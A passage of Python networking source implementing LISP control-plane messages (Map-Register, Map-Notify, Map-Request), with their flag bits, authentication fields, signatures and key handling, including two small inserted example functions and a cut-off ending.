        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = True if (typeflags & 0x01) else False
            self.rloc_probe = True if (typeflags & 0x02) else False
            self.smr_invoked_bit = True if (flags & 0x40) else False

        if (self.type == LISP_ECM):
            self.ddt_bit = True if (typeflags & 0x04) else False
            self.to_etr = True if (typeflags & 0x02) else False
            self.to_ms = True if (typeflags & 0x01) else False

        if (self.type == LISP_NAT_INFO):
            self.info_reply = True if (typeflags & 0x08) else False

        return(True)

    def is_info_request(self):
        return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))

    def is_info_reply(self):
        return(True if self.info_reply else False)

    def is_rloc_probe(self):
        return(True if self.rloc_probe else False)

    def is_smr(self):
        return(True if self.smr_bit else False)

    def is_smr_invoked(self):
        return(True if self.smr_invoked_bit else False)

    def is_ddt(self):
        return(True if self.ddt_bit else False)

    def is_to_etr(self):
        return(True if self.to_etr else False)

    def is_to_ms(self):
        return(True if self.to_ms else False)
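
#
# Editor's note (not in the original source): a decode sketch for
# lisp_control_header -- the first byte packs the type (high nibble) and
# flag bits (low nibble). Uses the same native "BBBBQ" layout decode()
# expects.
#
def example_control_header_decode():
    first_byte = (LISP_MAP_REQUEST << 4) | 0x02     # type + rloc-probe
    packet = struct.pack("BBBBQ", first_byte, 0x40, 0, 1, 0)

    header = lisp_control_header()
    if (header.decode(packet)):
        assert header.type == LISP_MAP_REQUEST
        assert header.is_rloc_probe() and header.is_smr_invoked()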
class lisp_map_register(object):
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        xtr_id = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")

        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID)
            else ""), self.auth_len, xtr_id, self.site_id))

    def encode(self):
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        #
        # The authentication length is fixed by the hash algorithm.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN

            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return(packet)

    def zero_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = b""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")

        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)

    def encode_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce = byte_swap_64(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) \
            else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        #
        # Decode the e-bit and encryption key-id.
        #
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        #
        # The xtr-id and site-id trail the packet, if present.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return([None, None])

        packet = packet[format_size::]

        #
        # Parse the authentication data and return the packet with the
        # auth field zeroed so the hash can be recomputed and compared.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(
                    self.alg_id))
                return([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return([None, None])

                auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
                auth4 = b""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return([None, None])

                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
                auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return([orig_packet, packet])

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQQ")

        #
        # Return False on a short packet so the caller's "== False" check
        # in decode() actually fires (the original returned a list here).
        #
        if (len(packet) < format_size): return(False)
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        self.site_id = byte_swap_64(site_id)
        return(True)
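
#
# Editor's note (not in the original source): an encode sketch for
# lisp_map_register -- with sha2-256 authentication selected, encode()
# emits the 16-byte header followed by a zeroed auth field, ready for
# the HMAC to be computed over the whole message.
#
def example_map_register_encode():
    register = lisp_map_register()
    register.record_count = 1
    register.nonce = 0xabcd
    register.key_id = 1
    register.alg_id = LISP_SHA_256_128_ALG_ID

    packet = register.encode()
    assert len(packet) == 4 + 12 + LISP_SHA2_256_AUTH_DATA_LEN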
class lisp_map_notify(object):
    def __init__(self, lisp_sockets):
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []

    def print_notify(self):
        auth_data = binascii.hexlify(self.auth_data)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
            auth_data = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and
            len(auth_data) != 64):
            auth_data = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(bold("Map-Notify-Ack", False) if
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID)
            else ""), self.auth_len, auth_data))

    def zero_auth(self, packet):
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)

        packet += auth_data
        return(packet)

    def encode(self, eid_records, password):
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return(self.packet)

        #
        # Append zeroed authentication data, hash the whole message, then
        # splice the hash into the auth field.
        #
        packet = self.zero_auth(packet)
        packet += eid_records

        hash_output = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = hash_output
        packet = packet[0:offset] + hash_output + \
            packet[offset + auth_len::]
        self.packet = packet
        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(packet_format, packet[:format_size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return(self.eid_records)

        #
        # Parse the authentication data and return the packet with the
        # auth field zeroed so the hash can be recomputed and compared.
        #
        if (len(packet) < self.auth_len): return(None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])

        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return(packet)
class lisp_map_request(object):
    def __init__(self):
        self.auth_bit = False
        self.map_data_present = False
        self.rloc_probe = False
        self.smr_bit = False
        self.pitr_bit = False
        self.smr_invoked_bit = False
        self.mobile_node = False
        self.xtr_id_present = False
        self.local_xtr = False
        self.dont_reply_bit = False
        self.itr_rloc_count = 0
        self.record_count = 0
        self.nonce = 0
        self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.itr_rlocs = []
        self.keys = None
        self.privkey_filename = None
        self.map_request_signature = None
        self.subscribe_bit = False
        self.xtr_id = None
        self.json_telemetry = None

    def print_prefix(self):
        if (self.target_group.is_null()):
            return(green(self.target_eid.print_prefix(), False))
        return(green(self.target_eid.print_sg(self.target_group), False))

    def print_map_request(self):
        sub_str = ""
        if (self.xtr_id != None and self.subscribe_bit):
            sub_str = "subscribe, xtr-id: 0x{}, ".format(
                lisp_hex_string(self.xtr_id))

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
            "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
            "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")

        lprint(line.format(bold("Map-Request", False),
            "A" if self.auth_bit else "a",
            "D" if self.map_data_present else "d",
            "R" if self.rloc_probe else "r",
            "S" if self.smr_bit else "s",
            "P" if self.pitr_bit else "p",
            "I" if self.smr_invoked_bit else "i",
            "M" if self.mobile_node else "m",
            "X" if self.xtr_id_present else "x",
            "L" if self.local_xtr else "l",
            "D" if self.dont_reply_bit else "d", self.itr_rloc_count,
            self.record_count, lisp_hex_string(self.nonce),
            self.source_eid.afi, green(self.source_eid.print_address(), False),
            " (with sig)" if self.map_request_signature != None else "",
            self.target_eid.afi, green(self.print_prefix(), False), sub_str))

        keys = self.keys
        for itr_rloc in self.itr_rlocs:
            if (itr_rloc.afi == LISP_AFI_LCAF and self.json_telemetry != None):
                continue

            addr_str = red(itr_rloc.print_address_no_iid(), False)
            lprint("  itr-rloc: afi {} {}{}".format(itr_rloc.afi, addr_str,
                "" if (keys == None) else ", " + keys[1].print_keys()))
            keys = None

        if (self.json_telemetry != None):
            lprint("  itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
                self.json_telemetry))

    def sign_map_request(self, privkey):
        sig_eid = self.signature_eid.print_address()
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        self.map_request_signature = privkey.sign(sig_data)
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
            "signature" : sig }
        return(json.dumps(sig))

    def verify_map_request_sig(self, pubkey):
        sig_eid = green(self.signature_eid.print_address(), False)
        if (pubkey == None):
            lprint("Public-key not found for signature-EID {}".format(sig_eid))
            return(False)

        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        pubkey = binascii.a2b_base64(pubkey)

        good = True
        try:
            key = ecdsa.VerifyingKey.from_pem(pubkey)
        except:
            lprint("Invalid public-key in mapping system for sig-eid {}". \
                format(self.signature_eid.print_address_no_iid()))
            good = False

        if (good):
            try:
                good = key.verify(self.map_request_signature, sig_data)
            except:
                good = False

        passfail = bold("passed" if good else "failed", False)
        lprint("Signature verification {} for EID {}".format(passfail,
            sig_eid))
        return(good)

    def encode_json(self, json_string):

        # A JSON LCAF is the JSON string prefixed with an 8-byte LCAF
        # header and followed by a null AFI.
        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(len(json_string) + 4)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
            lcaf_len, json_len)
        packet += json_string.encode()
        packet += struct.pack("H", 0)
        return(packet)

    def encode(self, probe_dest, probe_port):
        first_long = (LISP_MAP_REQUEST << 28) | self.record_count

        # When RLOC-probing with telemetry configured, one extra ITR-RLOC
        # (a JSON LCAF) is appended to the message.
        telemetry = lisp_telemetry_configured() if (self.rloc_probe) else None
        if (telemetry != None): self.itr_rloc_count += 1
        first_long = first_long | (self.itr_rloc_count << 8)

        if (self.auth_bit): first_long |= 0x08000000
        if (self.map_data_present): first_long |= 0x04000000
        if (self.rloc_probe): first_long |= 0x02000000
        if (self.smr_bit): first_long |= 0x01000000
        if (self.pitr_bit): first_long |= 0x00800000
        if (self.smr_invoked_bit): first_long |= 0x00400000
        if (self.mobile_node): first_long |= 0x00200000
        if (self.xtr_id_present): first_long |= 0x00100000
        if (self.local_xtr): first_long |= 0x00004000
        if (self.dont_reply_bit): first_long |= 0x00002000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)

        # If a private-key is configured, sign the Map-Request and carry
        # the signature in a JSON LCAF as the source-EID.
        encode_sig = False
        filename = self.privkey_filename
        if (filename != None and os.path.exists(filename)):
            f = open(filename, "r"); key = f.read(); f.close()
            try:
                key = ecdsa.SigningKey.from_pem(key)
            except:
                return(None)

            json_string = self.sign_map_request(key)
            encode_sig = True
        elif (self.map_request_signature != None):
            sig = binascii.b2a_base64(self.map_request_signature)
            json_string = { "source-eid" : self.source_eid.print_address(),
                "signature-eid" : self.signature_eid.print_address(),
                "signature" : sig }
            json_string = json.dumps(json_string)
            encode_sig = True

        if (encode_sig):
            packet += self.encode_json(json_string)
        else:
            if (self.source_eid.instance_id != 0):
                packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
                packet += self.source_eid.lcaf_encode_iid()
            else:
                packet += struct.pack("H", socket.htons(self.source_eid.afi))
                packet += self.source_eid.pack_address()

        # If this is an RLOC-probe, reuse any crypto keys already
        # negotiated with the probed RLOC.
        if (probe_dest):
            if (probe_port == 0): probe_port = LISP_DATA_PORT
            addr_str = probe_dest.print_address_no_iid() + ":" + \
                str(probe_port)

            if (addr_str in lisp_crypto_keys_by_rloc_encap):
                self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]

        # Encode the ITR-RLOCs. When lisp-crypto is enabled, the first
        # ITR-RLOC carries our key material in a Security LCAF.
        for itr_rloc in self.itr_rlocs:
            if (lisp_data_plane_security and
                self.itr_rlocs.index(itr_rloc) == 0):
                if (self.keys == None or self.keys[1] == None):
                    keys = lisp_keys(1)
                    self.keys = [None, keys, None, None]

                keys = self.keys[1]
                keys.add_key_by_nonce(self.nonce)
                packet += keys.encode_lcaf(itr_rloc)
            else:
                packet += struct.pack("H", socket.htons(itr_rloc.afi))
                packet += itr_rloc.pack_address()

        # Append the telemetry JSON LCAF with the ITR output timestamp.
        if (telemetry != None):
            ts = str(time.time())
            telemetry = lisp_encode_telemetry(telemetry, io=ts)
            self.json_telemetry = telemetry
            packet += self.encode_json(telemetry)

        mask_len = 0 if self.target_eid.is_binary() == False else \
            self.target_eid.mask_len

        # The subscribe-bit requests pubsub notifications and requires an
        # xtr-id to be appended to the message.
        subscribe = 0
        if (self.subscribe_bit):
            subscribe = 0x80
            self.xtr_id_present = True
            if (self.xtr_id == None):
                self.xtr_id = random.randint(0, (2**128) - 1)

        packet_format = "BB"
        packet += struct.pack(packet_format, subscribe, mask_len)

        if (self.target_group.is_null() == False):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_sg(self.target_group)
        elif (self.target_eid.instance_id != 0 or
            self.target_eid.is_geo_prefix()):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.target_eid.afi))
            packet += self.target_eid.pack_address()

        if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
        return(packet)

    def lcaf_decode_json(self, packet):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = \
            struct.unpack(packet_format, packet[:format_size])

        if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)

        # Validate lengths. The LCAF length covers the JSON string plus
        # the 2-byte JSON length field and the 2-byte trailing AFI.
        lcaf_len = socket.ntohs(lcaf_len)
        json_len = socket.ntohs(json_len)
        packet = packet[format_size::]
        if (len(packet) < lcaf_len): return(None)
        if (lcaf_len != json_len + 4): return(None)

        # Parse the JSON string.
        json_string = packet[0:json_len]
        packet = packet[json_len::]

        # Check if the JSON string carries telemetry data.
        if (lisp_is_json_telemetry(json_string) != None):
            self.json_telemetry = json_string

        # Consume the trailing AFI that terminates the LCAF.
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0): return(packet)

        if (self.json_telemetry != None): return(packet)

        # Otherwise, the JSON string carries a Map-Request signature.
        try:
            json_string = json.loads(json_string)
        except:
            return(None)

        if ("source-eid" not in json_string): return(packet)
        eid = json_string["source-eid"]
        afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
            eid.count(":") == 7 else None
        if (afi == None):
            lprint("Bad JSON 'source-eid' value: {}".format(eid))
            return(None)

        self.source_eid.afi = afi
        self.source_eid.store_address(eid)

        if ("signature-eid" not in json_string): return(packet)
        eid = json_string["signature-eid"]
        if (eid.count(":") != 7):
            lprint("Bad JSON 'signature-eid' value: {}".format(eid))
            return(None)

        self.signature_eid.afi = LISP_AFI_IPV6
        self.signature_eid.store_address(eid)

        if ("signature" not in json_string): return(packet)
        sig = binascii.a2b_base64(json_string["signature"])
        self.map_request_signature = sig
        return(packet)

    def decode(self, packet, source, port):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.auth_bit = True if (first_long & 0x08000000) else False
        self.map_data_present = True if (first_long & 0x04000000) else False
        self.rloc_probe = True if (first_long & 0x02000000) else False
        self.smr_bit = True if (first_long & 0x01000000) else False
        self.pitr_bit = True if (first_long & 0x00800000) else False
        self.smr_invoked_bit = True if (first_long & 0x00400000) else False
        self.mobile_node = True if (first_long & 0x00200000) else False
        self.xtr_id_present = True if (first_long & 0x00100000) else False
        self.local_xtr = True if (first_long & 0x00004000) else False
        self.dont_reply_bit = True if (first_long & 0x00002000) else False
        self.itr_rloc_count = (first_long >> 8) & 0x1f
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        # The xtr-id, when present, occupies the last 16 bytes of the
        # message.
        if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) == False): return(None)

        format_size = struct.calcsize("H")
        if (len(packet) < format_size): return(None)

        afi = struct.unpack("H", packet[:format_size])
        self.source_eid.afi = socket.ntohs(afi[0])
        packet = packet[format_size::]

        if (self.source_eid.afi == LISP_AFI_LCAF):
            save_packet = packet
            packet = self.source_eid.lcaf_decode_iid(packet)
            if (packet == None):
                packet = self.lcaf_decode_json(save_packet)
                if (packet == None): return(None)
        elif (self.source_eid.afi != LISP_AFI_NONE):
            packet = self.source_eid.unpack_address(packet)
            if (packet == None): return(None)

        self.source_eid.mask_len = self.source_eid.host_mask_len()

        no_crypto = (os.getenv("LISP_NO_CRYPTO") != None)
        self.itr_rlocs = []
        count = self.itr_rloc_count + 1

        while (count != 0):
            format_size = struct.calcsize("H")
            if (len(packet) < format_size): return(None)

            afi = socket.ntohs(struct.unpack("H", packet[:format_size])[0])
            itr_rloc = lisp_address(LISP_AFI_NONE, "", 32, 0)
            itr_rloc.afi = afi

            # An LCAF-encoded ITR-RLOC is either a JSON LCAF carrying
            # telemetry or a Security LCAF carrying the ITR's key material.
            if (itr_rloc.afi == LISP_AFI_LCAF):
                save_packet = packet
                json_packet = packet[format_size::]
                packet = self.lcaf_decode_json(json_packet)
                if (packet == None): return(None)
                if (packet == json_packet): packet = save_packet

            if (itr_rloc.afi != LISP_AFI_LCAF):
                if (len(packet) < itr_rloc.addr_length()): return(None)
                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                # The ITR is not doing lisp-crypto for this Map-Request,
                # so remove any decap keys stored for its RLOC and tell
                # the data-plane.
                if (lisp_nat_traversal and itr_rloc.is_private_address() and
                    source): itr_rloc = source

                decap_keys = lisp_crypto_keys_by_rloc_decap
                if (addr_str in decap_keys): decap_keys.pop(addr_str)

                lisp_write_ipc_decap_key(addr_str, None)

            elif (self.json_telemetry == None):

                # Decode the Security LCAF once to learn the cipher suite,
                # then re-decode it with matching key parameters.
                save_packet = packet
                cs_probe = lisp_keys(1)
                packet = cs_probe.decode_lcaf(save_packet, 0)
                if (packet == None): return(None)

                cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                    LISP_CS_25519_CHACHA]
                if (cs_probe.cipher_suite in cs_list):
                    if (cs_probe.cipher_suite == LISP_CS_25519_CBC or
                        cs_probe.cipher_suite == LISP_CS_25519_GCM):
                        key = lisp_keys(1, do_poly=False, do_chacha=False)
                    if (cs_probe.cipher_suite == LISP_CS_25519_CHACHA):
                        key = lisp_keys(1, do_poly=True, do_chacha=True)
                else:
                    key = lisp_keys(1, do_poly=False, do_curve=False,
                        do_chacha=False)

                packet = key.decode_lcaf(save_packet, 0)
                if (packet == None): return(None)

                if (len(packet) < format_size): return(None)
                afi = struct.unpack("H", packet[:format_size])[0]
                itr_rloc.afi = socket.ntohs(afi)
                if (len(packet) < itr_rloc.addr_length()): return(None)

                packet = itr_rloc.unpack_address(packet[format_size::])
                if (packet == None): return(None)

                if (no_crypto):
                    self.itr_rlocs.append(itr_rloc)
                    count -= 1
                    continue

                addr_str = lisp_build_crypto_decap_lookup_key(itr_rloc, port)

                stored_key = None
                if (lisp_nat_traversal and itr_rloc.is_private_address() and
                    source): itr_rloc = source

                if (addr_str in lisp_crypto_keys_by_rloc_decap):
                    keys = lisp_crypto_keys_by_rloc_decap[addr_str]
                    stored_key = keys[1] if keys and keys[1] else None

                new_keying = True
                if (stored_key):
                    if (stored_key.compare_keys(key)):

                        # Same key material as last time, keep using it.
                        self.keys = [None, stored_key, None, None]
                        lprint("Maintain stored decap-keys for RLOC {}". \
                            format(red(addr_str, False)))
                    else:

                        # The ITR rekeyed; keep our keypair and recompute
                        # the shared secret below.
                        new_keying = False
                        rekey = bold("Remote decap-rekeying", False)
                        lprint("{} for RLOC {}".format(rekey,
                            red(addr_str, False)))
                        key.copy_keypair(stored_key)
                        key.uptime = stored_key.uptime
                        stored_key = None

                if (stored_key == None):
                    self.keys = [None, key, None, None]
                    if (lisp_i_am_etr == False and lisp_i_am_rtr == False):
                        key.local_public_key = None
                        lprint("{} for {}".format(bold("Ignoring decap-keys",
                            False), red(addr_str, False)))
                    elif (key.remote_public_key != None):
                        if (new_keying):
                            lprint("{} for RLOC {}".format(
                                bold("New decap-keying", False),
                                red(addr_str, False)))
                        key.compute_shared_key("decap")
                        key.add_key_by_rloc(addr_str, False)

            self.itr_rlocs.append(itr_rloc)
            count -= 1

        format_size = struct.calcsize("BBH")
        if (len(packet) < format_size): return(None)

        subscribe, mask_len, afi = struct.unpack("BBH", packet[:format_size])
        self.subscribe_bit = (subscribe & 0x80)
        self.target_eid.afi = socket.ntohs(afi)
        packet = packet[format_size::]

        self.target_eid.mask_len = mask_len
        if (self.target_eid.afi == LISP_AFI_LCAF):
            packet, target_group = self.target_eid.lcaf_decode_eid(packet)
            if (packet == None): return(None)
            if (target_group): self.target_group = target_group
        else:
            packet = self.target_eid.unpack_address(packet)
            if (packet == None): return(None)
            packet = packet[format_size::]

        return(packet)

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.target_eid, self.target_group))

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        packet += struct.pack("QQ", xtr_id_upper, xtr_id_lower)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQ")
        if (len(packet) < format_size): return(None)
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
